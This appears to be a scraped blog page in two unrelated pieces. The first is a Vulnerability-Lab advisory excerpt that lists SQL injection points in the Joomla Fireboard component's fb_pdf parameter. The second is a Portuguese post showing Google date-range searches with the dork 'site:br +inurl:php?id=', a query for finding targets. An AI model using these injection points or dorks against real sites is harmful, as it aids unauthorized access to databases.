SITE.com/index.php?option=com_fireboard&Itemid=0&id=1&catid=5&func=fb_pdf'[SQL-INJECTION]
SITE.com/2012/index.php?option=com_fireboard&Itemid=79&id=1&catid=2&func=fb_pdf'[SQL-INJECTION]
SITE.com/fireboard/index.php?option=com_fireboard&Itemid=38&id=22111&catid=16&func=fb_pdf'[SQL-INJECTION]
SITE.com/board/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION]
SITE.com/jmfireboard/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION]



Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: [email protected] - [email protected] - [email protected]
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

sexta-feira, 10 de agosto de 2012

Busca avançada por datas especificas.

Busca avançada por datas especificas.

As vezes é um saco quando vamos fazer uma busca e aprece alguns assuntos do tempo da vovozinha.
Vou lhes mostra uma maneira de forçar nosso querido Google a busca no range desejamos.

Dork = site:br +inurl:php?id=

Data1= 8/8/2000
Data2=10/8/2000

As datas ficam nesse formato padrão &tbs=cdr:1,cd_min:Data1,cd_max:Data2

Data que deseja procurar inicio: 8/8/2000 até: 10/8/2000

Sua URL Fica assim:

https://www.google.com/search?tbs=tl:1&q=Dork&tbs=cdr:1,cd_min:Data1,cd_max:Data2

Bom proveito